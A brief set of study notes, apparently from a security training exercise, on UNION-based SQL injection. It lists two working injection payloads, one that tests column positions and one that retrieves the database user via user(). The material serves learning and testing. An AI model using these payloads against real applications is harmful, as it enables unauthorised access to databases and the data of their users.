Last updated 9 months ago
Using UNION
abc' # any string not listed UNION select 1,2,3--
space after --
Use a Union injection to get the result of 'user()'
cn' UNION select 1,user(),3,4--